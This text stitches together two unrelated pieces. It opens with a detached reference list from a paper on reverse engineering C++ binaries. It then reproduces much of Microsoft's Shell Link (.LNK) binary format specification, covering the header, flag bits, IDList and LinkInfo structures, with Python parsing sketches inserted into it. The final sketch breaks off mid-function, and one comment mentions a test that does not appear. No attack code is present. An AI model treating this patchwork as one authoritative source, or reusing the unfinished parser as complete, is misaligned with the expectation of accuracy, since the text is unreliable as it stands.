[3] Keith D. Cooper, Timothy J. Harvey, and Ken Kennedy. Iterative data-flow analysis, revisited. Technical report, Rice University, 2004.

[4] David Dewey and Jonathon T. Giffin. Static detection of C++ vtable escape vulnerabilities in binary code. In Proceedings of the 19th Annual Network and Distributed System Security Symposium (NDSS'12), http://www.internetsociety.org/static-detection-c-vtable-escape-vulnerabilities-binary-code, 2012.

[5] Agner Fog, Technical University of Denmark.
Calling conventions for different C++ compilers and operating systems. http://www.agner.org/optimize/calling_conventions.pdf, pages 16–17, last updated 04-09-2013.

[6] Alexander Fokin, Katerina Troshina, and Alexander Chernov. Reconstruction of class hierarchies for decompilation of C++ programs. In Proceedings of the 14th European Conference on Software Maintenance and Reengineering (CSMR'10), IEEE, pages 240–243, 2010.

[7] Alexander Fokin, Egor Derevenetc, Alexander Chernov, and Katerina Troshina. SmartDec: approaching C++ decompilation. In Proceedings of the 18th Working Conference on Reverse Engineering (WCRE'11), pages 347–356, 2011.

[8] Jan Gray. C++: Under the Hood. http://www.openrce.org/articles/files/jangrayhood.pdf, 1994.

[9] S. Horwitz, T. Reps, and D. Binkley. Interprocedural slicing using dependence graphs. In Proceedings of the ACM SIGPLAN 1988 Conference on Programming Language Design and Implementation (PLDI'88), pages 35–46, 1988.

[10] Harold Johnson. Data flow analysis for 'intractable' system software. In SIGPLAN Symposium on Compiler Construction, pages 109–117, 1986.

[11] James C. King. Symbolic execution and program testing. Communications of the ACM (CACM), 19(7), July 1976.

[12] Ákos Kiss, Judit Jász, and Tibor Gyimóthy. Using dynamic information in the interprocedural static slicing of binary executables. Software Quality Control, 13(3):227–245, September 2005.

[13] JongHyup Lee, Thanassis Avgerinos, and David Brumley. TIE: principled reverse engineering of types in binary programs. In NDSS. The Internet Society, 2011.

[14] Z. Lin, X. Zhang, and D. Xu. Automatic reverse engineering of data structures from binary execution. In Proceedings of the Network and Distributed System Security Symposium (NDSS'10), March 2010.

[15] Dan Quinlan. ROSE: compiler support for object-oriented frameworks. In Parallel Processing Letters 10, no. 02n03, pages 215–226, 2000.

[16] G. Ramalingam, John Field, and Frank Tip.
Aggregate structure identification and its application to program analysis. In Proceedings of the 26th ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages (POPL'99), pages 119–132, New York, NY, USA, 1999. ACM.

[17] ROSE website. http://www.rosecompiler.org.

[18] Paul Vincent Sabanal and Mark Vincent Yason. Reversing C++. http://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf.

[19] Asia Slowinska, Traian Stancescu, and Herbert Bos. DDE: dynamic data structure excavation. In Proceedings of the First ACM Asia-Pacific Workshop on Systems (APSys'10), pages 13–18, New York, NY, USA, 2010. ACM.

[20] V. K. Srinivasan and T. Reps. Software architecture recovery from machine code. Technical Report TR1781, University of Wisconsin-Madison, March 2013. http://digital.library.wisc.edu/1793/65091.

[21] Jens Tröger and Cristina Cifuentes. Analysis of virtual method invocation for binary translation. In Proceedings of the 9th Working Conference on Reverse Engineering (WCRE'02), IEEE Computer Society, pages 65–, 2002.

[MS-SHLLINK] — v20100601
Shell Link (.LNK) Binary File Format
Copyright © 2010 Microsoft Corporation.
Release: Tuesday, June 1, 2010

[MS-SHLLINK]: Shell Link (.LNK) Binary File Format

Intellectual Property Rights Notice for Open Specifications Documentation

- Technical Documentation. Microsoft publishes Open Specifications documentation for protocols, file formats, languages, and standards, as well as overviews of the interaction among each of these technologies.

- Copyrights. This documentation is covered by Microsoft copyrights.
Regardless of any other terms that are contained in the terms of use for the Microsoft website that hosts this documentation, you may make copies of it in order to develop implementations of the technologies described in the Open Specifications and may distribute portions of it in your implementations using these technologies or your documentation as necessary to properly document the implementation. You may also distribute in your implementation, with or without modification, any schema, IDLs, or code samples that are included in the documentation. This permission also applies to any documents that are referenced in the Open Specifications.

- No Trade Secrets. Microsoft does not claim any trade secret rights in this documentation.

- Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com.

- Trademarks. The names of companies and products contained in this documentation may be covered by trademarks or similar intellectual property rights. This notice does not grant any licenses under those rights.

- Fictitious Names. The example companies, organizations, products, domain names, e-mail addresses, logos, people, places, and events depicted in this documentation are fictitious.
No association with any real company, organization, product, domain name, e-mail address, logo, person, place, or event is intended or should be inferred.

Reservation of Rights. All other rights are reserved, and this notice does not grant any rights other than as specifically described above, whether by implication, estoppel, or otherwise.

Tools. The Open Specifications do not require the use of Microsoft programming tools or programming environments in order for you to develop an implementation. If you have access to Microsoft programming tools and environments, you are free to take advantage of them. Certain Open Specifications are intended for use in conjunction with publicly available standard specifications and network programming art, and assume that the reader either is familiar with the aforementioned material or has immediate access to it.

Revision Summary

Date        Revision History  Revision Class  Comments
05/22/2009  0.1               Major           First Release.
07/02/2009  0.1.1             Editorial       Revised and edited the technical content.
08/14/2009  0.2               Minor           Updated the technical content.
09/25/2009  0.3               Minor           Updated the technical content.
11/06/2009  0.3.1             Editorial       Revised and edited the technical content.
12/18/2009  0.3.2             Editorial       Revised and edited the technical content.
01/29/2010  0.4               Minor           Updated the technical content.
03/12/2010  0.4.1             Editorial       Revised and edited the technical content.
04/23/2010  0.5               Minor           Updated the technical content.
06/04/2010  0.6               Minor           Updated the technical content.

Contents

1 Introduction
  1.1 Glossary
  1.2 References
    1.2.1 Normative References
    1.2.2 Informative References
  1.3 Overview
  1.4 Relationship to Protocols and Other Structures
  1.5 Applicability Statement
  1.6 Versioning and Localization
  1.7 Vendor-Extensible Fields
2 Structures
  2.1 ShellLinkHeader
    2.1.1 LinkFlags
    2.1.2 FileAttributesFlags
    2.1.3 HotKeyFlags
  2.2 LinkTargetIDList
    2.2.1 IDList
    2.2.2 ItemID
  2.3 LinkInfo
    2.3.1 VolumeID
    2.3.2 CommonNetworkRelativeLink
  2.4 StringData
  2.5 ExtraData
    2.5.1 ConsoleDataBlock
    2.5.2 ConsoleFEDataBlock
    2.5.3 DarwinDataBlock
    2.5.4 EnvironmentVariableDataBlock
    2.5.5 IconEnvironmentDataBlock
    2.5.6 KnownFolderDataBlock
    2.5.7 PropertyStoreDataBlock
    2.5.8 ShimDataBlock
    2.5.9 SpecialFolderDataBlock
    2.5.10 TrackerDataBlock
    2.5.11 VistaAndAboveIDListDataBlock
3 Structure Examples
  3.1 Shortcut to a File
4 Security
5 Appendix A: Product Behavior
6 Change Tracking
7 Index

1 Introduction

This is a specification of the Shell Link Binary File Format. In this format a structure is called a shell link, or shortcut, and is a data object that contains information that can be used to access another data object. The Shell Link Binary File Format is the format of Microsoft Windows® files with the extension "LNK". Shell links are commonly used to support application launching and linking scenarios, such as Object Linking and Embedding (OLE), but they also can be used by applications that need the ability to store a reference to a target file.
1.1 Glossary

The following terms are defined in [MS-GLOS]: American National Standards Institute (ANSI) character set, Augmented Backus-Naur Form (ABNF), class identifier (CLSID), code page, Component Object Model (COM), Coordinated Universal Time (UTC), GUID, little-endian, NetBIOS name, object (3), Unicode, Universal Naming Convention (UNC).

The following terms are specific to this document:

extra data section: A data structure appended to the basic Shell Link Binary File Format data that contains additional information about the link target.

folder integer ID: An integer value that identifies a known folder.

folder GUID ID: A GUID value that identifies a known folder. Some folder GUID ID values correspond to folder integer ID values.

item ID (ItemID): A structure that represents an item in the context of a shell data source.

item ID list (IDList): A data structure that refers to a location. An item ID list is a multi-segment data structure where each segment's content is defined by a data source that is responsible for the location in the namespace referred to by the preceding segments.

link: An object that refers to another item.

link target: The item that a link references. In the case of a shell link, the referenced item is identified by its location in the link target namespace using an item ID list (IDList).

link target namespace: A hierarchical namespace. In Windows, the link target namespace is the Windows Explorer namespace, as described in [C706].

namespace: An abstract container used to hold a set of unique identifiers.

Object Linking and Embedding (OLE): A technology for transferring and sharing information between applications by inserting a file or part of a file into a compound document. The inserted file can be either linked or embedded. An embedded item is stored as part of the compound document that contains it; a linked item stores its data in a separate file.

relative path: A path that is implied by the current working directory or is calculated based on a specified directory. When a user enters a command that refers to a file, and the full path is not entered, the current working directory becomes the relative path of the referenced file.

resolving a link: The act of finding a specific link target, confirming that it exists, and finding whether it has moved.

Red-Green-Blue (RGB): A mapping of color components in which red, green, and blue and an intensity value are combined in various ways to reproduce a range of colors.

shell data source: An object that is responsible for a specific location in the namespace and for enumerating and binding IDLists to handlers.

shell link: A structure in Shell Link Binary File Format.

shim: A mechanism used to provide custom behavior to applications that do not work on newer versions of the operating system.

shortcut: A term that is used synonymously with shell link.

MAY, SHOULD, MUST, SHOULD NOT, MUST NOT: These terms (in all caps) are used as described in [RFC2119]. All statements of optional behavior use either MAY, SHOULD, or SHOULD NOT.

1.2 References

1.2.1 Normative References

We conduct frequent surveys of the normative references to assure their continued availability. If you have any issue with finding a normative reference, please contact dochelp@microsoft.com. We will assist you in finding the relevant information. Please check the archive site, http://msdn2.microsoft.com/en-us/library/E4BD6494-06AD-4aed-9823-445E921C9624, as an additional source.

[MS-DFSNM] Microsoft Corporation, "Distributed File System (DFS): Namespace Management Protocol Specification", September 2007.

[MS-DTYP] Microsoft Corporation, "Windows Data Types", January 2007.
[MS-LCID] Microsoft Corporation, "Windows Language Code Identifier (LCID) Reference", July 2007.

[MS-PROPSTORE] Microsoft Corporation, "Property Store Binary File Format", May 2009.

[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate Requirement Levels", BCP 14, RFC 2119, March 1997, http://www.ietf.org/rfc/rfc2119.txt

[RFC5234] Crocker, D., Ed., and Overell, P., "Augmented BNF for Syntax Specifications: ABNF", STD 68, RFC 5234, January 2008, http://www.ietf.org/rfc/rfc5234.txt

1.2.2 Informative References

[C706] The Open Group, "DCE 1.1: Remote Procedure Call", C706, August 1997, http://www.opengroup.org/public/pubs/catalog/c706.htm

[MS-DLTW] Microsoft Corporation, "Distributed Link Tracking: Workstation Protocol Specification", January 2007.

[MS-GLOS] Microsoft Corporation, "Windows Protocols Master Glossary", March 2007.

[MSCHARSET] Microsoft Corporation, "INFO: Windows, Code Pages, and Character Sets", February 2005, http://support.microsoft.com/kb/75435

[MSDN-CODEPAGE] Microsoft Corporation, "Code Pages", http://msdn.microsoft.com/en-us/goglobal/bb964653.aspx

[MSDN-ISHELLLINK] Microsoft Corporation, "IShellLink Interface", http://msdn.microsoft.com/en-us/library/bb774950.aspx

[MS-CFB] Microsoft Corporation, "Compound File Binary File Format", October 2008.

[MSDN-MSISHORTCUTS] Microsoft Corporation, "How Windows Installer Shortcuts Work", http://support.microsoft.com/kb/243630

1.3 Overview

The Shell Link Binary File Format specifies a structure called a shell link. That structure is used to store a reference to a location in a link target namespace, which is referred to as a link target. The most important component of a shell link is the link target, which is specified in the form of an item ID list (IDList).
The shell link structure stores various information that is useful to end users, including:

- A keyboard shortcut that can be used to launch an application.
- A descriptive comment.
- Settings that control application behavior.
- Optional data stored in extra data sections.

Optional data can include a property store that contains an extensible set of properties in the format that is described in [MS-PROPSTORE].

The Shell Link Binary File Format can be managed using a COM object, programmed using the IShellLink interface, and saved into its persistence format using the IPersistStream or IPersistFile interface. It is most common for shell links to be stored in a file with the .LNK file extension. By using the IPersistStream interface, a shell link can be saved into another storage system, for example a database or the registry, or embedded in another file format. For more information, see [MSDN-ISHELLLINK].

Multi-byte data values in the Shell Link Binary File Format are stored in little-endian format.

1.4 Relationship to Protocols and Other Structures

The Shell Link Binary File Format is used by the Compound File Binary File Format [MS-CFB]. The Shell Link Binary File Format uses the Property Store Binary File Format [MS-PROPSTORE].

1.5 Applicability Statement

This document specifies a persistence format for links to files in a file system or to applications that are available for installation. This persistence format is applicable for use as a stand-alone file and for containment within other structures.

1.6 Versioning and Localization

This specification covers versioning issues in the following areas:

Localization: The Shell Link Binary File Format defines the ConsoleFEDataBlock structure (section 2.5.2), which specifies a code page for displaying text.
That value can be used to specify a set of characters for a particular language or locale.

1.7 Vendor-Extensible Fields

A shell data source can extend the persistence format by storing custom data inside ItemID structures. The ItemIDs embedded in an IDList are in a format specified by the shell data sources that manage the ItemIDs. The ItemIDs are free to store whatever data is needed in this structure to uniquely identify the items in their namespace. The property store embedded in a link can be used to store property values in the shell link.

2 Structures

The Shell Link Binary File Format consists of a sequence of structures that conform to the following ABNF rules [RFC5234]:

SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]
             [STRING_DATA] *EXTRA_DATA

SHELL_LINK_HEADER: A ShellLinkHeader structure (section 2.1), which contains identification information, timestamps, and flags that specify the presence of optional structures.

LINKTARGET_IDLIST: An optional LinkTargetIDList structure (section 2.2), which specifies the target of the link. The presence of this structure is specified by the HasLinkTargetIDList bit (LinkFlags section 2.1.1) in the ShellLinkHeader.

LINKINFO: An optional LinkInfo structure (section 2.3), which specifies information necessary to resolve the link target. The presence of this structure is specified by the HasLinkInfo bit (LinkFlags section 2.1.1) in the ShellLinkHeader.

STRING_DATA: Zero or more optional StringData structures (section 2.4), which are used to convey user interface and path identification information. The presence of these structures is specified by bits (LinkFlags section 2.1.1) in the ShellLinkHeader.

EXTRA_DATA: Zero or more ExtraData structures (section 2.5).
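As a quick illustration of this sequence, the following Python sketch (illustrative only, not part of the specification) validates the two fixed ShellLinkHeader constants defined in section 2.1 and reports which of the optional top-level structures follow, using the HasLinkTargetIDList and HasLinkInfo bits defined in section 2.1.1:

```python
import struct
import uuid

# MUST-values from section 2.1 of this specification.
LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HEADER_SIZE = 0x4C

def check_shell_link(data: bytes) -> dict:
    """Validate the fixed ShellLinkHeader constants and report which
    optional top-level structures follow the header."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != HEADER_SIZE:
        raise ValueError("HeaderSize MUST be 0x0000004C")
    # LinkCLSID is stored in little-endian GUID layout on disk.
    if uuid.UUID(bytes_le=bytes(data[4:20])) != LINK_CLSID:
        raise ValueError("LinkCLSID MUST be 00021401-0000-0000-C000-000000000046")
    link_flags, = struct.unpack_from("<I", data, 20)
    return {
        "HasLinkTargetIDList": bool(link_flags & 0x00000001),
        "HasLinkInfo": bool(link_flags & 0x00000002),
    }
```

A conforming header is exactly 76 (0x4C) bytes, so the remaining header fields (timestamps, FileSize, and so on) sit at fixed offsets after LinkFlags.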
2.1 ShellLinkHeader

The ShellLinkHeader structure contains identification information, timestamps, and flags that specify the presence of optional structures, including LinkTargetIDList (section 2.2), LinkInfo (section 2.3), and StringData (section 2.4). The structure consists of the following fields, in order: HeaderSize, LinkCLSID, LinkFlags, FileAttributes, CreationTime, AccessTime, WriteTime, FileSize, IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3.

HeaderSize (4 bytes): The size, in bytes, of this structure. This value MUST be 0x0000004C.

LinkCLSID (16 bytes): A class identifier (CLSID). This value MUST be 00021401-0000-0000-C000-000000000046.

LinkFlags (4 bytes): A LinkFlags structure (section 2.1.1) that specifies information about the shell link and the presence of optional portions of the structure.

FileAttributes (4 bytes): A FileAttributesFlags structure (section 2.1.2) that specifies information about the link target.

CreationTime (8 bytes): A FILETIME structure ([MS-DTYP] section 2.3.1) that specifies the creation time of the link target in UTC (Coordinated Universal Time). If the value is zero, there is no creation time set on the link target.

AccessTime (8 bytes): A FILETIME structure ([MS-DTYP] section 2.3.1) that specifies the access time of the link target in UTC (Coordinated Universal Time). If the value is zero, there is no access time set on the link target.

WriteTime (8 bytes): A FILETIME structure ([MS-DTYP] section 2.3.1) that specifies the write time of the link target in UTC (Coordinated Universal Time). If the value is zero, there is no write time set on the link target.

FileSize (4 bytes): A 32-bit unsigned integer that specifies the size, in bytes, of the link target. If the link target file is larger than 0xFFFFFFFF, this value specifies the least significant 32 bits of the link target file size.

IconIndex (4 bytes): A 32-bit signed integer that specifies the index of an icon within a given icon location.

ShowCommand (4 bytes): A 32-bit unsigned integer that specifies the expected window state of an application launched by the link. This value SHOULD be one of the following:

SW_SHOWNORMAL (0x00000001): The application is open and its window is open in a normal fashion.
SW_SHOWMAXIMIZED (0x00000003): The application is open, and keyboard focus is given to the application, but its window is not shown.
SW_SHOWMINNOACTIVE (0x00000007): The application is open, but its window is not shown. It is not given the keyboard focus.

All other values MUST be treated as SW_SHOWNORMAL.

HotKey (2 bytes): A HotKeyFlags structure (section 2.1.3) that specifies the keystrokes used to launch the application referenced by the shortcut key. This value is assigned to the application after it is launched, so that pressing the key activates that application.

Reserved1 (2 bytes): A value that MUST be zero.

Reserved2 (4 bytes): A value that MUST be zero.

Reserved3 (4 bytes): A value that MUST be zero.

2.1.1 LinkFlags

The LinkFlags structure defines bits that specify which shell link structures are present in the file format after the ShellLinkHeader structure (section 2.1). The bits, from least significant (A) to most significant (AA), are defined as follows; the remaining five high bits MUST be zero:

A HasLinkTargetIDList: The shell link is saved with an item ID list (IDList). If this bit is set, a LinkTargetIDList structure (section 2.2) MUST follow the ShellLinkHeader.

B HasLinkInfo: The shell link is saved with link information. If this bit is set, a LinkInfo structure (section 2.3) MUST be present.

C HasName: The shell link is saved with a name string. If this bit is set, a NAME_STRING StringData structure (section 2.4) MUST be present.

D HasRelativePath: The shell link is saved with a relative path string. If this bit is set, a RELATIVE_PATH StringData structure (section 2.4) MUST be present.

E HasWorkingDir: The shell link is saved with a working directory string. If this bit is set, a WORKING_DIR StringData structure (section 2.4) MUST be present.

F HasArguments: The shell link is saved with command line arguments. If this bit is set, a COMMAND_LINE_ARGUMENTS StringData structure (section 2.4) MUST be present.

G HasIconLocation: The shell link is saved with an icon location string. If this bit is set, an ICON_LOCATION StringData structure (section 2.4) MUST be present.

H IsUnicode: The shell link contains Unicode encoded strings. This bit SHOULD be set.

I ForceNoLinkInfo: The LinkInfo structure (section 2.3) is ignored.

J HasExpString: The shell link is saved with an EnvironmentVariableDataBlock (section 2.5.4).

K RunInSeparateProcess: The target is run in a separate virtual machine when launching a link target that is a 16-bit application.

L Unused1: A bit that is undefined and MUST be ignored.

M HasDarwinID: The shell link is saved with a DarwinDataBlock (section 2.5.3).

N RunAsUser: The application is run as a different user when the target of the shell link is activated.

O HasExpIcon: The shell link is saved with an IconEnvironmentDataBlock (section 2.5.5).

P NoPidlAlias: The file system location is represented in the shell namespace when the path to an item is parsed into an IDList.

Q Unused2: A bit that is undefined and MUST be ignored.

R RunWithShimLayer: The shell link is saved with a ShimDataBlock (section 2.5.8).

S ForceNoLinkTrack: The TrackerDataBlock (section 2.5.10) is ignored.

T EnableTargetMetadata: The shell link attempts to collect target properties and store them in the PropertyStoreDataBlock (section 2.5.7) when the link target is set.

U DisableLinkPathTracking: The EnvironmentVariableDataBlock is ignored.

V DisableKnownFolderTracking: The SpecialFolderDataBlock (section 2.5.9) and the KnownFolderDataBlock (section 2.5.6) are ignored when loading the shell link. If this bit is set, these extra data blocks SHOULD NOT be saved when saving the shell link.

W DisableKnownFolderAlias: If the link has a KnownFolderDataBlock (section 2.5.6), the unaliased form of the known folder IDList SHOULD be used when translating the target IDList at the time that the link is loaded.

X AllowLinkToLink: Creating a link that references another link is enabled. Otherwise, specifying a link as the target IDList SHOULD NOT be allowed.

Y UnaliasOnSave: When saving a link for which the target IDList is under a known folder, either the unaliased form of that known folder or the target IDList SHOULD be used.

Z PreferEnvironmentPath: The target IDList SHOULD NOT be stored; instead, the path specified in the EnvironmentVariableDataBlock (section 2.5.4) SHOULD be used to refer to the target.

AA KeepLocalIDListForUNCTarget: When the target is a UNC name that refers to a location on a local machine, the local path IDList in the PropertyStoreDataBlock (section 2.5.7) SHOULD be stored, so it can be used when the link is loaded on the local machine.

2.1.2 FileAttributesFlags

The FileAttributesFlags structure defines bits that specify the file attributes of the link target, if the target is a file system item. File attributes can be used if the link target is not available, or if accessing the target would be inefficient.
It is possible for the target item's attributes to be out of sync with this value. The bits, from least significant (A) upward, are defined as follows; the remaining high bits MUST be zero:

A FILE_ATTRIBUTE_READONLY: The file or directory is read-only. For a file, if this bit is set, applications can read the file but cannot write to it or delete it. For a directory, if this bit is set, applications cannot delete the directory.

B FILE_ATTRIBUTE_HIDDEN: The file or directory is hidden. If this bit is set, the file or folder is not included in an ordinary directory listing.

C FILE_ATTRIBUTE_SYSTEM: The file or directory is part of the operating system or is used exclusively by the operating system.

D Reserved1: A bit that MUST be zero.

E FILE_ATTRIBUTE_DIRECTORY: The link target is a directory instead of a file.

F FILE_ATTRIBUTE_ARCHIVE: The file or directory is an archive file. Applications use this flag to mark files for backup or removal.

G Reserved2: A bit that MUST be zero.

H FILE_ATTRIBUTE_NORMAL: The file or directory has no other flags set. If this bit is 1, all other bits in this structure MUST be clear.

I FILE_ATTRIBUTE_TEMPORARY: The file is being used for temporary storage.

J FILE_ATTRIBUTE_SPARSE_FILE: The file is a sparse file.

K FILE_ATTRIBUTE_REPARSE_POINT: The file or directory has an associated reparse point.

L FILE_ATTRIBUTE_COMPRESSED: The file or directory is compressed. For a file, this means that all data in the file is compressed. For a directory, this means that compression is the default for newly created files and subdirectories.

M FILE_ATTRIBUTE_OFFLINE: The data of the file is not immediately available.

N FILE_ATTRIBUTE_NOT_CONTENT_INDEXED: The contents of the file need to be indexed.

O FILE_ATTRIBUTE_ENCRYPTED: The file or directory is encrypted. For a file, this means that all data in the file is encrypted. For a directory, this means that encryption is the default for newly created files and subdirectories.

2.1.3 HotKeyFlags

The HotKeyFlags structure specifies input generated by a combination of keyboard keys being pressed. It consists of a LowByte followed by a HighByte.

LowByte (1 byte): An 8-bit unsigned integer that specifies a virtual key code that corresponds to a key on the keyboard. This value MUST be one of the following:

0x30 through 0x39: "0" key through "9" key
0x41 through 0x5A: "A" key through "Z" key
VK_F1 (0x70) through VK_F24 (0x87): "F1" key through "F24" key
VK_NUMLOCK (0x90): "NUM LOCK" key
VK_SCROLL (0x91): "SCROLL LOCK" key

HighByte (1 byte): An 8-bit unsigned integer that specifies bits that correspond to modifier keys on the keyboard. This value MUST be one or a combination of the following:

HOTKEYF_SHIFT (0x01): The "SHIFT" key on the keyboard.
HOTKEYF_CONTROL (0x02): The "CTRL" key on the keyboard.
HOTKEYF_ALT (0x04): The "ALT" key on the keyboard.

2.2 LinkTargetIDList

The LinkTargetIDList structure specifies the target of the link. The presence of this optional structure is specified by the HasLinkTargetIDList bit (LinkFlags section 2.1.1) in the ShellLinkHeader (section 2.1).

IDListSize (2 bytes): The size, in bytes, of the IDList field.

IDList (variable): A stored IDList structure (section 2.2.1), which contains the item ID list. An IDList structure conforms to the following ABNF [RFC5234]:

IDLIST = *ITEMID TERMINALID

2.2.1 IDList

The stored IDList structure specifies the format of a persisted item ID list.

ItemIDList (variable): An array of zero or more ItemID structures (section 2.2.2).

TerminalID (2 bytes): A 16-bit, unsigned integer that indicates the end of the item IDs. This value MUST be zero.
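The termination rule lends itself to a simple loop. A minimal Python sketch (illustrative only, not part of the specification) that splits a stored IDList into its ItemID Data payloads:

```python
import struct

def parse_idlist(buf: bytes) -> list:
    """Split a stored IDList (section 2.2.1) into ItemID Data payloads.
    Each ItemIDSize counts the 2-byte size field itself, so the Data
    payload is ItemIDSize - 2 bytes; a zero TerminalID ends the list."""
    items, pos = [], 0
    while True:
        item_id_size, = struct.unpack_from("<H", buf, pos)
        if item_id_size == 0:  # TerminalID: end of the item IDs
            return items
        items.append(buf[pos + 2 : pos + item_id_size])
        pos += item_id_size
```

For example, two ItemIDs of sizes 5 and 4 followed by a zero TerminalID yield two payloads of 3 and 2 bytes; interpreting each payload is up to the shell data source that owns that segment of the namespace.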
2.2.2 ItemID

An ItemID is an element in an IDList structure (section 2.2.1). The data stored in a given ItemID is defined by the source that corresponds to the location in the target namespace of the preceding ItemIDs. This data uniquely identifies the items in that part of the namespace.

ItemIDSize (2 bytes): A 16-bit, unsigned integer that specifies the size, in bytes, of the ItemID structure, including the ItemIDSize field.

Data (variable): The shell data source-defined data that specifies an item.

2.3 LinkInfo

The LinkInfo structure specifies information necessary to resolve a link target if it is not found in its original location. This includes information about the volume that the target was stored on, the mapped drive letter, and a Universal Naming Convention (UNC) form of the path if one existed when the link was created. For more details about UNC paths, see [MS-DFSNM] section 2.2.1.4.

The structure consists of the following fields, in order: LinkInfoSize, LinkInfoHeaderSize, LinkInfoFlags, VolumeIDOffset, LocalBasePathOffset, CommonNetworkRelativeLinkOffset, CommonPathSuffixOffset, LocalBasePathOffsetUnicode (optional), CommonPathSuffixOffsetUnicode (optional), VolumeID (variable), LocalBasePath (variable), CommonNetworkRelativeLink (variable), CommonPathSuffix (variable), LocalBasePathUnicode (variable), CommonPathSuffixUnicode (variable).

LinkInfoSize (4 bytes): A 32-bit, unsigned integer that specifies the size, in bytes, of the LinkInfo structure. All offsets specified in this structure MUST be less than this value, and all strings contained in this structure MUST fit within the extent defined by this size.
LinkInfoHeaderSize (4 bytes): A 32-bit, unsigned integer that specifies the size, in bytes, of the LinkInfo header section, which includes all specified offsets. This value MUST be defined as shown in the following table, and it MUST be less than LinkInfoSize.<1>

0x0000001C: Offsets to the optional fields are not specified.
0x00000024 ≤ value: Offsets to the optional fields are specified.

LinkInfoFlags (4 bytes): Flags that specify whether the VolumeID, LocalBasePath, LocalBasePathUnicode, and CommonNetworkRelativeLink fields are present in this structure. All bits other than A and B MUST be zero. The bits are defined as:

A VolumeIDAndLocalBasePath: If set, the VolumeID and LocalBasePath fields are present, and their locations are specified by the values of the VolumeIDOffset and LocalBasePathOffset fields, respectively. If the value of the LinkInfoHeaderSize field is greater than or equal to 0x00000024, the LocalBasePathUnicode field is present, and its location is specified by the value of the LocalBasePathOffsetUnicode field. If not set, the VolumeID, LocalBasePath, and LocalBasePathUnicode fields are not present, and the values of the VolumeIDOffset and LocalBasePathOffset fields are zero. If the value of the LinkInfoHeaderSize field is greater than or equal to 0x00000024, the value of the LocalBasePathOffsetUnicode field is zero.

B CommonNetworkRelativeLinkAndPathSuffix: If set, the CommonNetworkRelativeLink field is present, and its location is specified by the value of the CommonNetworkRelativeLinkOffset field. If not set, the CommonNetworkRelativeLink field is not present, and the value of the CommonNetworkRelativeLinkOffset field is zero.

VolumeIDOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of the VolumeID field. If the VolumeIDAndLocalBasePath flag is set, this value is an offset, in bytes, from the start of the LinkInfo structure; otherwise, this value MUST be zero.

LocalBasePathOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of the LocalBasePath field. If the VolumeIDAndLocalBasePath flag is set, this value is an offset, in bytes, from the start of the LinkInfo structure; otherwise, this value MUST be zero.

CommonNetworkRelativeLinkOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of the CommonNetworkRelativeLink field. If the CommonNetworkRelativeLinkAndPathSuffix flag is set, this value is an offset, in bytes, from the start of the LinkInfo structure; otherwise, this value MUST be zero.

CommonPathSuffixOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of the CommonPathSuffix field. This value is an offset, in bytes, from the start of the LinkInfo structure.

LocalBasePathOffsetUnicode (4 bytes): An optional, 32-bit, unsigned integer that specifies the location of the LocalBasePathUnicode field. If the VolumeIDAndLocalBasePath flag is set, this value is an offset, in bytes, from the start of the LinkInfo structure; otherwise, this value MUST be zero. This field can be present only if the value of the LinkInfoHeaderSize field is greater than or equal to 0x00000024.

CommonPathSuffixOffsetUnicode (4 bytes): An optional, 32-bit, unsigned integer that specifies the location of the CommonPathSuffixUnicode field. This value is an offset, in bytes, from the start of the LinkInfo structure. This field can be present only if the value of the LinkInfoHeaderSize field is greater than or equal to 0x00000024.
VolumeID (variable): An optional VolumeID structure (section 2.3.1) that specifies information about the volume that the link target was on when the link was created. This field is present if the VolumeIDAndLocalBasePath flag is set.

LocalBasePath (variable): An optional, NULL-terminated string, defined by the system default code page, which is used to construct the full path to the link item or link target by appending the string in the CommonPathSuffix field. This field is present if the VolumeIDAndLocalBasePath flag is set.

CommonNetworkRelativeLink (variable): An optional CommonNetworkRelativeLink structure (section 2.3.2) that specifies information about the network location where the link target is stored.

CommonPathSuffix (variable): A NULL-terminated string, defined by the system default code page, which is used to construct the full path to the link item or link target by being appended to the string in the LocalBasePath field.

LocalBasePathUnicode (variable): An optional, NULL-terminated, Unicode string that is used to construct the full path to the link item or link target by appending the string in the CommonPathSuffixUnicode field. This field can be present only if the VolumeIDAndLocalBasePath flag is set and the value of the LinkInfoHeaderSize field is greater than or equal to 0x00000024.

CommonPathSuffixUnicode (variable): An optional, NULL-terminated, Unicode string that is used to construct the full path to the link item or link target by being appended to the string in the LocalBasePathUnicode field. This field can be present only if the value of the LinkInfoHeaderSize field is greater than or equal to 0x00000024.

2.3.1 VolumeID

The VolumeID structure specifies information about the volume that a link target was on when the link was created. This information is useful for resolving the link if the file is not found in its original location.
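The LocalBasePath/CommonPathSuffix concatenation rule of section 2.3 can be made concrete with a small sketch (illustrative only; the fixed field offsets follow the LinkInfo field order above, treating the system default code page as Latin-1 is purely an assumption for the example, and the sample values in the test are hypothetical):

```python
import struct

VOLUME_ID_AND_LOCAL_BASE_PATH = 0x00000001  # LinkInfoFlags bit A

def read_cstr(buf: bytes, offset: int) -> str:
    """Read a NULL-terminated string; Latin-1 stands in for the
    system default code page in this sketch."""
    return buf[offset:buf.index(b"\x00", offset)].decode("latin-1")

def local_path(link_info: bytes):
    """Rebuild the target path from a LinkInfo blob: the LocalBasePath
    string with the CommonPathSuffix string appended, when the
    VolumeIDAndLocalBasePath flag is set; None otherwise."""
    flags, = struct.unpack_from("<I", link_info, 8)        # LinkInfoFlags
    if not flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
        return None
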